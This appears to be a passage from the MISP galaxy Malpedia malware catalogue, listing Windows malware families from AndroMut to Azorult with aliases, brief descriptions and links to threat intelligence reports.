http://resources.infosecinstitute.com/andromeda-bot-analysis/
http://www.0xebfe.net/blog/2013/03/30/fooled-by-andromeda/
https://www.virusbulletin.com/virusbulletin/2013/08/andromeda-2-7-features
https://blogs.technet.microsoft.com/mmpc/2017/12/04/microsoft-teams-up-with-law-enforcement-and-other-partners-to-disrupt-gamarue-andromeda/
https://www.virusbulletin.com/virusbulletin/2018/02/review-evolution-andromeda-over-years-we-say-goodbye/
https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf
https://www.proofpoint.com/sites/default/files/proofpoint-operation-transparent-tribe-threat-insight-en.pdf
https://www.crowdstrike.com/blog/how-to-remediate-hidden-malware-real-time-response/
https://eternal-todo.com/blog/andromeda-gamarue-loves-json
http://resources.infosecinstitute.com/andromeda-bot-analysis-part-two/
https://byte-atlas.blogspot.ch/2015/04/kf-andromeda-bruteforcing.html

AndroMut

The tag is: misp-galaxy:malpedia="AndroMut"

AndroMut is also known as:

Gelup

Table 1390. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.andromut
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/
https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/
https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505-part3/
https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf
https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf
https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf
https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south

Anel

The tag is: misp-galaxy:malpedia="Anel"

Anel is also known as:

UPPERCUT
lena

Table 1391. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.anel
https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf
https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf
https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/
https://www.secureworks.com/research/threat-profiles/bronze-riverside
https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf

AnteFrigus

Ransomware that demands payment in Bitcoin.

The tag is: misp-galaxy:malpedia="AnteFrigus"

AnteFrigus is also known as:

Table 1392. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.antefrigus
https://github.com/albertzsigovits/malware-notes/blob/master/Antefrigus.md
http://id-ransomware.blogspot.com/2019/11/antefrigus-ransomware.html

Antilam

The tag is: misp-galaxy:malpedia="Antilam"

Antilam is also known as:

Latinus

Table 1393. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.antilam

Anubis (Windows)

According to Microsoft Security Intelligence, Anubis is an information stealer sold on underground forums since June 2020. The name overlaps with the Android banking malware but is unrelated. It contains code forked from Loki PWS.

The tag is: misp-galaxy:malpedia="Anubis (Windows)"

Anubis (Windows) is also known as:

Anubis Stealer

Table 1394. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis
https://twitter.com/MsftSecIntel/status/1298752223321546754
https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/
https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/

Apocalipto

The tag is: misp-galaxy:malpedia="Apocalipto"

Apocalipto is also known as:

Table 1395. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalipto
https://www.visakorea.com/dam/VCOM/download/merchants/Grocery_Malware_04242013.pdf

Apocalypse

The tag is: misp-galaxy:malpedia="Apocalypse"

Apocalypse is also known as:

Table 1396. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.apocalypse_ransom
http://blog.emsisoft.com/2016/06/29/apocalypse-ransomware-which-targets-companies-through-insecure-rdp/

Apostle

Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.

The tag is: misp-galaxy:malpedia="Apostle"

Apostle is also known as:

Table 1397. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle
https://assets.sentinelone.com/sentinellabs/evol-agrius
https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/
https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf
https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/

AppleJeus (Windows)

The tag is: misp-galaxy:malpedia="AppleJeus (Windows)"

AppleJeus (Windows) is also known as:

Table 1398. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f
https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d
https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html
https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e
https://us-cert.cisa.gov/ncas/alerts/aa21-048a
https://twitter.com/VK_Intel/status/1182730637016481793

Appleseed

The tag is: misp-galaxy:malpedia="Appleseed"

Appleseed is also known as:

JamBog

Table 1399. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed
https://asec.ahnlab.com/ko/26705/
https://www.youtube.com/watch?v=rfzmHjZX70s
https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf
https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf
https://www.youtube.com/watch?v=Dv2_DK3tRgI
https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/
https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/
https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf
https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf

ArdaMax

The tag is: misp-galaxy:malpedia="ArdaMax"

ArdaMax is also known as:

Table 1400. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax
https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf

Arefty

The tag is: misp-galaxy:malpedia="Arefty"

Arefty is also known as:

Table 1401. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty
http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/

Aria-body

The tag is: misp-galaxy:malpedia="Aria-body"

Aria-body is also known as:

Table 1402. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody
https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/
https://securelist.com/naikons-aria/96899/

Arik Keylogger

The tag is: misp-galaxy:malpedia="Arik Keylogger"

Arik Keylogger is also known as:

Aaron Keylogger

Table 1403. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.arik_keylogger
http://remote-keylogger.net/

Arkei Stealer

The tag is: misp-galaxy:malpedia="Arkei Stealer"

Arkei Stealer is also known as:

ArkeiStealer

Table 1404. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/

ARS VBS Loader

ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.

The tag is: misp-galaxy:malpedia="ARS VBS Loader"

ARS VBS Loader is also known as:

Table 1405. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader
https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/
https://twitter.com/Racco42/status/1001374490339790849
https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/

ARTFULPIE

The tag is: misp-galaxy:malpedia="ARTFULPIE"

ARTFULPIE is also known as:

Table 1406. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.artfulpie
https://labs.sentinelone.com/dprk-hidden-cobra-update-north-korean-malicious-cyber-activity/
https://www.us-cert.gov/ncas/analysis-reports/ar20-045e

Artra Downloader

The tag is: misp-galaxy:malpedia="Artra Downloader"

Artra Downloader is also known as:

Table 1407. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.artra
https://securelist.com/apt-trends-report-q1-2021/101967/
https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf
https://www.freebuf.com/articles/database/192726.html
https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/
https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english

AscentLoader

The tag is: misp-galaxy:malpedia="AscentLoader"

AscentLoader is also known as:

Table 1408. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ascentloader

ASPC

The tag is: misp-galaxy:malpedia="ASPC"

ASPC is also known as:

Table 1409. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.aspc

Asprox

The tag is: misp-galaxy:malpedia="Asprox"

Asprox is also known as:

Aseljo
BadSrc

Table 1410. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox
https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/
https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign
http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/

Asruex

The tag is: misp-galaxy:malpedia="Asruex"

Asruex is also known as:

Table 1411. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex
https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/
https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html

Astaroth

The tag is: misp-galaxy:malpedia="Astaroth"

Astaroth is also known as:

Guildma

Table 1412. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth
https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf
https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/
https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/
https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/
https://isc.sans.edu/diary/27482
https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf
https://blog.talosintelligence.com/2020/05/astaroth-analysis.html
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
https://blog.easysol.net/meet-lucifer-international-trojan/
https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/
https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

AsyncRAT

The tag is: misp-galaxy:malpedia="AsyncRAT"

AsyncRAT is also known as:

Table 1413. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat
https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service
https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader
https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages
https://labs.k7computing.com/?p=21759
https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf
https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/
https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns
https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/
https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html
https://www.bitdefender.com/files/News/CaseStudies/study/400/Bitdefender-PR-Whitepaper-MosaicLoader-creat5540-en-EN.pdf
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://twitter.com/MsftSecIntel/status/1392219299696152578
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/
https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html
https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html
https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies
https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/
https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols

AthenaGo RAT

The tag is: misp-galaxy:malpedia="AthenaGo RAT"

AthenaGo RAT is also known as:

Table 1414. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.athenago

ATI-Agent

The tag is: misp-galaxy:malpedia="ATI-Agent"

ATI-Agent is also known as:

Table 1415. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ati_agent
https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/

ATMii

The tag is: misp-galaxy:malpedia="ATMii"

ATMii is also known as:

Table 1416. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.atmii
https://securelist.com/atmii-a-small-but-effective-atm-robber/82707/

ATMitch

The tag is: misp-galaxy:malpedia="ATMitch"

ATMitch is also known as:

Table 1417. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.atmitch
https://securelist.com/blog/sas/77918/atmitch-remote-administration-of-atms/
https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf
https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/

Atmosphere

The tag is: misp-galaxy:malpedia="Atmosphere"

Atmosphere is also known as:

Table 1418. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere
https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/
https://www.group-ib.com/resources/threat-research/silence.html

ATMSpitter

The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll. Both libraries are legitimate Windows drivers used to interact with the components of different ATM models.

The tag is: misp-galaxy:malpedia="ATMSpitter"

ATMSpitter is also known as:

Table 1419. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter
https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf
http://www.secureworks.com/research/threat-profiles/gold-kingswood
https://www.secureworks.com/research/threat-profiles/gold-kingswood
https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf

ATOMSILO

The tag is: misp-galaxy:malpedia="ATOMSILO"

ATOMSILO is also known as:

Table 1420. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo
https://news.sophos.com/en-us/2021/10/04/atom-silo-ransomware-actors-use-confluence-exploit-dll-side-load-for-stealthy-attack/
https://chuongdong.com//reverse%20engineering/2021/10/13/AtomSiloRansomware/
https://twitter.com/siri_urz/status/1437664046556274694?s=20

Attor

Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.

Attor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability.

The most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim’s screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.

The tag is: misp-galaxy:malpedia="Attor"

Attor is also known as:

Table 1421. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.attor
https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform
https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami
https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/
https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html
https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf
https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/
https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/

August Stealer

The tag is: misp-galaxy:malpedia="August Stealer"

August Stealer is also known as:

Table 1422. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer
https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene
https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html

Auriga

The tag is: misp-galaxy:malpedia="Auriga"

Auriga is also known as:

Riodrv

Table 1423. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga
https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf

Aurora

Ransomware

The tag is: misp-galaxy:malpedia="Aurora"

Aurora is also known as:

OneKeyLocker

Table 1424. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora
https://twitter.com/malwrhunterteam/status/1001461507513880576
https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/
https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/

Avaddon

Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.

The tag is: misp-galaxy:malpedia="Avaddon"

Avaddon is also known as:

Table 1425. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon
https://twitter.com/Securityinbits/status/1271065316903120902
https://medium.com/s2wlab/quick-analysis-of-haron-ransomware-feat-avaddon-and-thanos-1ebb70f64dc4
https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound
https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1
https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/
https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/
https://labs.sentinelone.com/avaddon-raas-breaks-public-decryptor-continues-on-rampage/
https://www.advanced-intel.com/post/the-rise-demise-of-multi-million-ransomware-business-empire
https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/
https://www.welivesecurity.com/la-es/2021/05/31/ransomware-avaddon-principales-caracteristicas/
https://www.swascan.com/it/avaddon-ransomware/
https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/
https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf
https://therecord.media/avaddon-ransomware-operation-shuts-down-and-releases-decryption-keys/
https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted
https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/
https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/
https://twitter.com/dk_samper/status/1348560784285167617
https://arxiv.org/pdf/2102.04796.pdf
https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/
https://www.cyber.gov.au/sites/default/files/2021-05/2021-003%20Ongoing%20campaign%20using%20Avaddon%20Ransomware%20-%2020210508.pdf
https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/
https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure
https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/
https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/
https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/
https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware
https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3
https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html
https://www.tgsoft.it/files/report/download.asp?id=568531345
https://www.bleepingcomputer.com/news/security/avaddon-ransomware-shuts-down-and-releases-decryption-keys/

AvastDisabler

The tag is: misp-galaxy:malpedia="AvastDisabler"

AvastDisabler is also known as:

Table 1426. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler
https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/

AVCrypt

The tag is: misp-galaxy:malpedia="AVCrypt"

AVCrypt is also known as:

Table 1427. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt
https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/

Aveo

The tag is: misp-galaxy:malpedia="Aveo"

Aveo is also known as:

Table 1428. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo
https://www.secureworks.com/research/threat-profiles/bronze-overbrook
http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/

Ave Maria

Information stealer which uses AutoIT for wrapping.

The tag is: misp-galaxy:malpedia="Ave Maria"

Ave Maria is also known as:

AVE_MARIA
AveMariaRAT
Warzone RAT
avemaria

Table 1429. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
https://www.youtube.com/watch?v=81fdvmGmRvM
https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html
https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf
https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1
https://reaqta.com/2019/04/ave_maria-malware-part1/
http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery
https://www.youtube.com/watch?v=T0tdj1WDioM
https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest
https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA
https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/
https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html
https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique
https://www.youtube.com/watch?v=-G82xh9m4hc
https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html
https://blog.yoroi.company/research/the-ave_maria-malware/
https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw
https://securelist.com/apt-trends-report-q3-2020/99204/
https://www.ciphertechsolutions.com/roboski-global-recovery-automation/
https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf
https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt
https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html
https://securityintelligence.com/posts/roboski-global-recovery-automation/
https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/
https://blogs.quickheal.com/warzone-rat-beware-of-the-trojan-malware-stealing-data-triggering-from-various-office-documents/
https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf
https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/
https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat

AvosLocker

The tag is: misp-galaxy:malpedia="AvosLocker"

AvosLocker is also known as:

Table 1430. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.avos_locker
https://blog.malwarebytes.com/threat-analysis/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners/
https://unit42.paloaltonetworks.com/emerging-ransomware-groups/

Avzhan

The tag is: misp-galaxy:malpedia="Avzhan"

Avzhan is also known as:

Table 1431. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan
https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/

Ayegent

The tag is: misp-galaxy:malpedia="Ayegent"

Ayegent is also known as:

Table 1432. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent

Aytoke

Keylogger.

The tag is: misp-galaxy:malpedia="Aytoke"

Aytoke is also known as:

Table 1433. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.aytoke
https://snort.org/rule_docs/1-34217

Azorult

AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.

The tag is: misp-galaxy:malpedia="Azorult"

Azorult is also known as:

PuffStealer
Rultazo

Table 1434. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult
https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/
https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/
https://yoroi.company/research/apt-or-not-apt-whats-behind-the-aggah-campaign/
https://community.riskiq.com/article/2a36a7d2/description
https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d
https://community.riskiq.com/article/56e28880
https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05
https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/
https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors
https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html
https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/
https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware
https://isc.sans.edu/diary/25120
https://ke-la.com/whats-dead-may-never-die-azorult-infostealer-decommissioned-again/
https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html
https://www.youtube.com/watch?v=EyDiIAtdI[https://www.youtube.com/watch?v=EyDiIAtdI]
https://fr3d.hk/blog/gazorp-thieving-from-thieves
https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/
https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/
https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/
https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/
